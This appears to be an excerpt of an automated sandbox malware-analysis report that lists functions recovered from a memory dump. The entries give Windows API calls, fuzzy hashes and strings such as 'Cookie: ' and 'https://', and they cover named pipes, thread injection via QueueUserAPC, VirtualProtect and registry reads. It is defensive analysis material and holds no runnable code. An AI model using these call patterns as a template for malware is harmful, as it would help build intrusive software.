HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00C9199D
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00C919BD
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00C919C9

Strings

https://, xrefs: 00C91913

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate
String ID: https://
API String ID: 3472947110-4275131719
Opcode ID: c719835d4e9217b4e3da9dfeb649c1a8339d294be6cd95b077c146b3ad0e3b26
Instruction ID: 7192f958c7990c20ae716dd9f3675fb85456f51966409341bf61b52e37a948f1
Opcode Fuzzy Hash: c719835d4e9217b4e3da9dfeb649c1a8339d294be6cd95b077c146b3ad0e3b26
Instruction Fuzzy Hash: C621B13150021ABBDF22AFA1DC8AFAE7F75EF41B58F198025FD0566061C7718E81EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CA0BB6, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 00CA0BE5
SetEvent.KERNEL32(?), ref: 00CA0C2F
TlsSetValue.KERNEL32(00000001), ref: 00CA0C69
TlsSetValue.KERNEL32(00000000), ref: 00CA0C85

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Value$Event
String ID:
API String ID: 3803239005-0
Opcode ID: 0bdc984182a49174c5b0d64a68c784a68a8d9d92de2540270ae823ad25b938de
Instruction ID: 785a269989a6c509cf0254c444ba232b44c072ecc58693040aa7785c5ac26f4a
Opcode Fuzzy Hash: 0bdc984182a49174c5b0d64a68c784a68a8d9d92de2540270ae823ad25b938de
Instruction Fuzzy Hash: 2C21E771100206DFCF259F55DC88AAE7BA6FF423A8F240625F522C61B0C771ED51EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CACC46, Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00CACC9F
memcpy.NTDLL(00000018,?,?), ref: 00CACCC8
RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0001292A,00000000,000000FF,00000008), ref: 00CACD07
HeapFree.KERNEL32(00000000,00000000), ref: 00CACD1A

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
String ID:
API String ID: 2780211928-0
Opcode ID: fb91ec1bcb49b9f93a775b03e0d2954cb9d08a6a1a173dd76d234222cca318ad
Instruction ID: 51b8e3207fde5bf47b3b74980f10e2023352cfe9a7f87a4f01d53c9bcbeb5bdf
Opcode Fuzzy Hash: fb91ec1bcb49b9f93a775b03e0d2954cb9d08a6a1a173dd76d234222cca318ad
Instruction Fuzzy Hash: 23318570500206AFDB209F68EC84F9E7BB8FF05764F004629F966D62A0D730ED15DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C98BC3, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C98BE5
lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 00C98C29
OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 00C98C6F
CloseHandle.KERNEL32(?,?,?,?,?), ref: 00C98C92

Part of subcall function 00CAEBD0: GetTickCount.KERNEL32 ref: 00CAEBE0
Part of subcall function 00CAEBD0: CreateFileW.KERNEL32(00CB0C37,80000000,00000003,00CBE0D4,00000003,00000000,00000000,?,00CB0C37,00000000,00000000,00C945A1,00000000), ref: 00CAEBFD
Part of subcall function 00CAEBD0: GetFileSize.KERNEL32(00CB0C37,00000000,Local\,00000001,?,00CB0C37,00000000,00000000,00C945A1,00000000), ref: 00CAEC29
Part of subcall function 00CAEBD0: CreateFileMappingA.KERNEL32(00CB0C37,00CBE0D4,00000002,00000000,00000000,00CB0C37), ref: 00CAEC3D
Part of subcall function 00CAEBD0: lstrlen.KERNEL32(00CB0C37,?,00CB0C37,00000000,00000000,00C945A1,00000000), ref: 00CAEC59
Part of subcall function 00CAEBD0: lstrcpy.KERNEL32(?,00CB0C37), ref: 00CAEC69
Part of subcall function 00CAEBD0: HeapFree.KERNEL32(00000000,00CB0C37,?,00CB0C37,00000000,00000000,00C945A1,00000000), ref: 00CAEC84
Part of subcall function 00CAEBD0: CloseHandle.KERNEL32(00CB0C37,Local\,00000001,?,00CB0C37), ref: 00CAEC96

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
String ID:
API String ID: 3239194699-0
Opcode ID: 399c1a9b99d7337aff7942d81fc8ad42434e8d6fce153303c367722284b95cda
Instruction ID: 5975434d730ba2e255b9643cb45abb15320d0e16400eb49e91bd08a9573431c0
Opcode Fuzzy Hash: 399c1a9b99d7337aff7942d81fc8ad42434e8d6fce153303c367722284b95cda
Instruction Fuzzy Hash: DE217A71541208EBDF20DFA5DD48EDE7BB8EF45354F140226FA29A3161EB318A49DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CB5E4D, Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(07D18D20), ref: 00CB5E63
RtlLeaveCriticalSection.NTDLL(07D18D20), ref: 00CB5E7E
GetLastError.KERNEL32 ref: 00CB5EEC
GetLastError.KERNEL32 ref: 00CB5EFB

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: 802b125ad92923065133cb3673be12ead8c40757c663acd8d2c6153b30194f14
Instruction ID: 67f103642c8db45345952a21ad23961620bc9e9f688fa75a2c5f92010c4b3ca1
Opcode Fuzzy Hash: 802b125ad92923065133cb3673be12ead8c40757c663acd8d2c6153b30194f14
Instruction Fuzzy Hash: 47212632900609EFCB129FA8DD08BDEBBB8EF04710F144246F915A3220CB38DA15DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6658, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00CA6687
lstrlen.KERNEL32(00000000), ref: 00CA6697

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

strcpy.NTDLL ref: 00CA66AE
StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 00CA66B8

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeaplstrlenmemsetstrcpy
String ID:
API String ID: 528014985-0
Opcode ID: 512ff54cb087a8f810fc88f246d0ce744cd00f74f2b06d9fff76b2b42d5ad667
Instruction ID: 5b0de2e35e3c09a852e92d0b8eb45447c1a9014bfec4daee065fd8266d36fb30
Opcode Fuzzy Hash: 512ff54cb087a8f810fc88f246d0ce744cd00f74f2b06d9fff76b2b42d5ad667
Instruction Fuzzy Hash: 80210475100302AFD710AF24EC89F2A77F8EF46359F088419F9A6872A1EF70C904CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00CB0120, Relevance: 6.1, APIs: 4, Instructions: 74threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA526B: GetTickCount.KERNEL32 ref: 00CA5281
Part of subcall function 00CA526B: wsprintfA.USER32 ref: 00CA52C2
Part of subcall function 00CA526B: GetModuleHandleA.KERNEL32(00000000), ref: 00CA52D4

GetModuleHandleA.KERNEL32(00000000,?), ref: 00CB0147
GetLastError.KERNEL32 ref: 00CB0161
RtlExitUserThread.NTDLL(?), ref: 00CB017B
GetLastError.KERNEL32 ref: 00CB01BB

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ErrorHandleLastModule$CountExitThreadTickUserwsprintf
String ID:
API String ID: 1798890819-0
Opcode ID: dcb90e3567ccab32ebab3bace3788c8e9e6a05e995a7feedbfd05a5df86bc218
Instruction ID: 0e9efbc6071846898b0ea3b64c6c65425cff9af66364f59c9083427c86c89f1c
Opcode Fuzzy Hash: dcb90e3567ccab32ebab3bace3788c8e9e6a05e995a7feedbfd05a5df86bc218
Instruction Fuzzy Hash: C6116D71004345AF9714AF69EC88EBF7BBCFA86761F140A19F862C2160DB709D48CB31

Uniqueness

Uniqueness Score: -1.00%

Function 00CAF643, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C93CA4: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,00CAF65A), ref: 00C93CCA

CreateFileA.KERNEL32(00CAE1EA,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,00CAE1EA,00000000), ref: 00CAF695
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00CAE1EA,4C72644C,?,00000B54), ref: 00CAF6A7
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,00CAE1EA,4C72644C,?,00000B54), ref: 00CAF6BF
CloseHandle.KERNEL32(?,?,?,?,00CAE1EA,4C72644C,?,00000B54), ref: 00CAF6DA

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateHandleModuleNamePointerRead
String ID:
API String ID: 1352878660-0
Opcode ID: 3742e0e9d777879e9b2c52771db952e90537148224f463ef52cf41b7f4cce976
Instruction ID: cfc90dfc0c6da7b57a8e24106dc20e9d074b64bfd801f08bcf80eac84a91487d
Opcode Fuzzy Hash: 3742e0e9d777879e9b2c52771db952e90537148224f463ef52cf41b7f4cce976
Instruction Fuzzy Hash: 6D117971600119BFDB20ABA5CC89FEFBE7DEF02794F104124F620E10A0D7308A45DAA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CB24E0, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(6AD68BFC,00C9619F,?,00C9619F,00000004), ref: 00CB2518

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

lstrcpy.KERNEL32(00000000,6AD68BFC), ref: 00CB252F
StrChrA.SHLWAPI(00000000,0000002E,?,00C9619F,00000004), ref: 00CB2538
GetModuleHandleA.KERNEL32(00000000,?,00C9619F,00000004), ref: 00CB2556

Part of subcall function 00C91000: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,6AD68BFC,?,00000004,00000000,00000004,00CBD518,00000000,?), ref: 00C910D7
Part of subcall function 00C91000: VirtualProtect.KERNELBASE(00000000,00000004,00CBD518,00CBD518,?,00000004,00000000,00000004,00CBD518,00000000,?,00000000,00000002,00CBA568,0000001C,00CA5176), ref: 00C910F2
Part of subcall function 00C91000: RtlEnterCriticalSection.NTDLL(00CBE240), ref: 00C91116

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
String ID:
API String ID: 105881616-0
Opcode ID: 93c68785c010cdc6b08385f3a2cd096b06dd89800583a6d20eea7d63ac77aefe
Instruction ID: 3ef2dec81c6d4f232ea692be08e3ef600eff1ceb769693d6aacc6667cc4fd8f4
Opcode Fuzzy Hash: 93c68785c010cdc6b08385f3a2cd096b06dd89800583a6d20eea7d63ac77aefe
Instruction Fuzzy Hash: F8218B70A00205EFDB20DF64C898BEEBBF9EF44340F148159E456DB260DBB0DA49EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CA2426, Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00CA2441
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CA2465
RegCloseKey.ADVAPI32(?), ref: 00CA24BD

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 00CA248E

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: QueryValue$AllocateCloseHeapOpen
String ID:
API String ID: 453107315-0
Opcode ID: 076631ce6999f6aac71f1c9d05cfc173b00a45e0915a568664cc15bde1ed481f
Instruction ID: eb9d8a2dd884709635dfa8a41af7f26b1a67df837fb32a1e01345eb80c2438da
Opcode Fuzzy Hash: 076631ce6999f6aac71f1c9d05cfc173b00a45e0915a568664cc15bde1ed481f
Instruction Fuzzy Hash: 262103B590011DFFCB119F99DD809EEBBB9EF89344F208066F815A6220E7719E41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CAB9C6, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00CAA40B,00000000,?,?,00CB4BA0,00000000,07D18D60), ref: 00CAB9D1
RtlAllocateHeap.NTDLL(00000000,?), ref: 00CAB9E9
memcpy.NTDLL(00000000,?,-00000008,?,?,?,00CAA40B,00000000,?,?,00CB4BA0,00000000,07D18D60), ref: 00CABA2D
memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 00CABA4E

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: da18b0475c9cf6d23a58209aa73cba24b7edda954675a960eb58882ff41722ff
Instruction ID: c68b6a1b6ea542d404b7815e26c0f1793b5b8ead2ead0cda611b2ceb6dad5d45
Opcode Fuzzy Hash: da18b0475c9cf6d23a58209aa73cba24b7edda954675a960eb58882ff41722ff
Instruction Fuzzy Hash: D3110672A00215AFC7109F69EC84F9EBBADDB923A0F150276F509D7151EA709E04D760

Uniqueness

Uniqueness Score: -1.00%

Function 00CA25FA, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,?,767FD3B0,07D18D54,?,?,?,00CA8517,?,00000020,07D18D54,?,?,00CB58C6,?,?), ref: 00CA2620
StrTrimA.SHLWAPI(?,00CBA48C,00000000,?,?,00CA8517,?,00000020,07D18D54,?,?,00CB58C6,?,?), ref: 00CA263F
StrChrA.SHLWAPI(?,?,?,?,00CA8517,?,00000020,07D18D54,?,?,00CB58C6,?,?), ref: 00CA2650
StrTrimA.SHLWAPI(00000001,00CBA48C,?,?,00CA8517,?,00000020,07D18D54,?,?,00CB58C6,?,?), ref: 00CA2662

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 2fe9fe4164d546f876644160d0fa43d1c702c8f3674b41a19c6048630891019f
Instruction ID: 93124645f0a32bd0f349784f6987252ae57d60d33e123448af4e11671d1b22d4
Opcode Fuzzy Hash: 2fe9fe4164d546f876644160d0fa43d1c702c8f3674b41a19c6048630891019f
Instruction Fuzzy Hash: 24114C7520121ABFCB019F59C884FAE7FB8EF86795F148019FC559B241D7B4DA00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA4151, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9F60A: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00C9F639
Part of subcall function 00C9F60A: HeapFree.KERNEL32(00000000,00000000,?,?,00CA4161,00000000,00000000,?,00000000,?,00CA1FAB,?,?,?,?,?), ref: 00C9F65C

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00CA1FAB,?,?,?,?,?,00000022,00000000,00000000), ref: 00CA418B

Part of subcall function 00CB14AB: lstrlen.KERNEL32(00000000,00000000,00000000,74785520,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00CB14C2
Part of subcall function 00CB14AB: lstrlen.KERNEL32(?), ref: 00CB14CA
Part of subcall function 00CB14AB: lstrlen.KERNEL32(?), ref: 00CB1535
Part of subcall function 00CB14AB: RtlAllocateHeap.NTDLL(00000000,?), ref: 00CB1560
Part of subcall function 00CB14AB: memcpy.NTDLL(00000000,00000002,?), ref: 00CB1571
Part of subcall function 00CB14AB: memcpy.NTDLL(00000000,?,?), ref: 00CB1587
Part of subcall function 00CB14AB: memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 00CB1599
Part of subcall function 00CB14AB: memcpy.NTDLL(00000000,00CB83E4,00000002,00000000,?,?,00000000,?,?), ref: 00CB15AC
Part of subcall function 00CB14AB: memcpy.NTDLL(00000000,?,00000002), ref: 00CB15C1

HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,00CA1FAB,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 00CA41D7

Strings

Cookie: , xrefs: 00CA4173
https://, xrefs: 00CA419A

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$Freelstrlen$Allocate
String ID: Cookie: $https://
API String ID: 2465664858-1563071917
Opcode ID: 68e0581fc188255ba07706c1763a35b8cd1912d6324ad1adf9e54e0f94a36341
Instruction ID: c77b2f7402200deae4ebc83b765a38fa743161789a3a46cd5e2a77198bb41191
Opcode Fuzzy Hash: 68e0581fc188255ba07706c1763a35b8cd1912d6324ad1adf9e54e0f94a36341
Instruction Fuzzy Hash: 3201C432510255BBCB225F69DC44FBE7F68DF92764F048224FD19A7250D670DE81D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA8215, Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,?,00CB493A,00000000,00000000), ref: 00CA8233
GetLastError.KERNEL32(?,00000000,?,00CB493A,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,00CAB1A8,?,0000001E), ref: 00CA823B

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 7b8741ee67970a9626642ab0f2a89ad63e45ff78ce2ba328b3e3a8d5e715be71
Instruction ID: 279c9320667420126f753f51de120d45c2efcac8e79660e725a909340451c22e
Opcode Fuzzy Hash: 7b8741ee67970a9626642ab0f2a89ad63e45ff78ce2ba328b3e3a8d5e715be71
Instruction Fuzzy Hash: 800184761486527F9A306B669C4CE6FBBACEBC7764B100B19F5B592290CE304808D6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00C941E7, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C941FA
lstrlen.KERNEL32(07D18BC0), ref: 00C9421B
RtlAllocateHeap.NTDLL(00000000,00000014), ref: 00C94233
lstrcpy.KERNEL32(00000000,07D18BC0), ref: 00C94245

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
String ID:
API String ID: 1929783139-0
Opcode ID: 5e8ac0732389c8d3284217c63614ee5e55378a5b3c300fc4e5855cc1fc3c0c99
Instruction ID: c159310532d544ff72567d841e3690f6ebf25ad60d8b37ed54cef8fc425d700f
Opcode Fuzzy Hash: 5e8ac0732389c8d3284217c63614ee5e55378a5b3c300fc4e5855cc1fc3c0c99
Instruction Fuzzy Hash: E4018476904644AFC7159FA9BC88FAEBFBCAB89341F144169F91AD3241DA309A09C760

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5B4A, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 00CA5B57
RtlAllocateHeap.NTDLL(00000000,00000015), ref: 00CA5B7D
lstrcpy.KERNEL32(00000014,?), ref: 00CA5BA2
memcpy.NTDLL(?,?,?), ref: 00CA5BAF

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeaplstrcpylstrlenmemcpy
String ID:
API String ID: 1388643974-0
Opcode ID: cd5a37ebec7a6cbe27a4a0589af83c142c6dad5d2ac5dd85c92efa402ed2d75f
Instruction ID: d2272cb8b21064e583b6efad6bb6be75dd6081bbde5afec631d76c8264b6c94f
Opcode Fuzzy Hash: cd5a37ebec7a6cbe27a4a0589af83c142c6dad5d2ac5dd85c92efa402ed2d75f
Instruction Fuzzy Hash: 4D11497550070AEFCB21CF58E884F9A7BF8FB49708F108569F85A87221D770E908DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CACFD0, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(?,Blocked), ref: 00CACFEC
lstrcmpi.KERNEL32(?,Main), ref: 00CAD021

Strings

Main, xrefs: 00CAD01B
Blocked, xrefs: 00CACFE6

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrcmpi
String ID: Blocked$Main
API String ID: 1586166983-1966386946
Opcode ID: fa34384eaa881b38f5e5bc3f7c5e5a11cfbc9bf4556ae99e3117471ca511e4b4
Instruction ID: fe27025e2507cb1abbb54fcacc7ab6d3ce2ad984fbe3e8a7018243d549c4b49d
Opcode Fuzzy Hash: fa34384eaa881b38f5e5bc3f7c5e5a11cfbc9bf4556ae99e3117471ca511e4b4
Instruction Fuzzy Hash: 2F01717520024BAB8B10EF65EC85E7F377DEF86754B144419FC1397212DB34D912ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CB2AED, Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,767FD3B0,00000000,?,00C965AB,00000000,747DF710,00000000,00000000,?,?,00CB58C6,?,?), ref: 00CB2AF4
RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 00CB2B0C
memcpy.NTDLL(0000000C,00C920D2,00000001,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00CB2B22

Part of subcall function 00CA25FA: StrChrA.SHLWAPI(?,?,767FD3B0,07D18D54,?,?,?,00CA8517,?,00000020,07D18D54,?,?,00CB58C6,?,?), ref: 00CA2620
Part of subcall function 00CA25FA: StrTrimA.SHLWAPI(?,00CBA48C,00000000,?,?,00CA8517,?,00000020,07D18D54,?,?,00CB58C6,?,?), ref: 00CA263F
Part of subcall function 00CA25FA: StrChrA.SHLWAPI(?,?,?,?,00CA8517,?,00000020,07D18D54,?,?,00CB58C6,?,?), ref: 00CA2650
Part of subcall function 00CA25FA: StrTrimA.SHLWAPI(00000001,00CBA48C,?,?,00CA8517,?,00000020,07D18D54,?,?,00CB58C6,?,?), ref: 00CA2662

HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 00CB2B54

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: HeapTrim$AllocateFreelstrlenmemcpy
String ID:
API String ID: 1635803283-0
Opcode ID: a317387df3a93f2ca1f289492320fd168e65b494bcf89f310b2ee6f2ce09616d
Instruction ID: 6f5eebb1c915f65ad7f2b705d24e0a069a1ad50799dfb3e90b5513388b239a12
Opcode Fuzzy Hash: a317387df3a93f2ca1f289492320fd168e65b494bcf89f310b2ee6f2ce09616d
Instruction Fuzzy Hash: 3001A232604301ABE7215F56EC88FAFBBACFB91B51F104535F61B990A0DB709C0AE761

Uniqueness

Uniqueness Score: -1.00%

Function 00CB1415, Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00CBE268), ref: 00CB1420
Sleep.KERNEL32(0000000A,?,?,?,00CA375B,00000000,?,00000029,00CBE088,00C9AC22,?), ref: 00CB142A
SetEvent.KERNEL32(?,?,?,00CA375B,00000000,?,00000029,00CBE088,00C9AC22,?), ref: 00CB1481
RtlLeaveCriticalSection.NTDLL(00CBE268), ref: 00CB14A0

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterEventLeaveSleep
String ID:
API String ID: 1925615494-0
Opcode ID: 4145788ddbca2e2663da87ef0164a3dd52e625d3212027de5f35299a840a0bd1
Instruction ID: ab02e68a113364ea747b38091aa140d5e7fc8e8d509b1829301c884c213689da
Opcode Fuzzy Hash: 4145788ddbca2e2663da87ef0164a3dd52e625d3212027de5f35299a840a0bd1
Instruction Fuzzy Hash: F00175B0644304BFE710ABA4AC05BEE3BACEB14782F504221F70AD6091D7709A04DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CAB1E7, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

RtlInitializeCriticalSection.NTDLL(00CBE240), ref: 00CAB20B
RtlInitializeCriticalSection.NTDLL(00CBE220), ref: 00CAB221
GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CB17C0), ref: 00CAB232
GetModuleHandleA.KERNEL32(00CBF01D), ref: 00CAB25F

Part of subcall function 00CAE9BE: GetModuleHandleA.KERNEL32(NTDLL.DLL,?,?,00000001), ref: 00CAE9CF
Part of subcall function 00CAE9BE: LoadLibraryA.KERNEL32(NTDSAPI.DLL,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CAEA69
Part of subcall function 00CAE9BE: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CAEA74

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
String ID:
API String ID: 1711133254-0
Opcode ID: ffb80e37e04c042065ca0a403cddae2a8fb7d113163e17924c3fe04ea42ffcf5
Instruction ID: 692edd1c8c646958467176c815791086fba5d513ffc888981f102cdef7c22f7e
Opcode Fuzzy Hash: ffb80e37e04c042065ca0a403cddae2a8fb7d113163e17924c3fe04ea42ffcf5
Instruction Fuzzy Hash: 4B016DB19102008BE714AFB9BC89BCD7BA8A746B14F00473BD15AC3261D7B41849DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00CAB585, Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,00CBE0D4,00CBE08C), ref: 00CAB5A9
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CB17C0), ref: 00CAB5F4

Part of subcall function 00CAC0AB: CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,00C9402D), ref: 00CAC0C2
Part of subcall function 00CAC0AB: QueueUserAPC.KERNELBASE(?,00000000,?,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00CAC0D7
Part of subcall function 00CAC0AB: GetLastError.KERNEL32(00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00CAC0E2
Part of subcall function 00CAC0AB: TerminateThread.KERNEL32(00000000,00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00CAC0EC
Part of subcall function 00CAC0AB: CloseHandle.KERNEL32(00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00CAC0F3
Part of subcall function 00CAC0AB: SetLastError.KERNEL32(00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00CAC0FC

GetLastError.KERNEL32(Function_00005A92,00000000,00000000), ref: 00CAB5DC
CloseHandle.KERNEL32(00000000), ref: 00CAB5EC

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
String ID:
API String ID: 1700061692-0
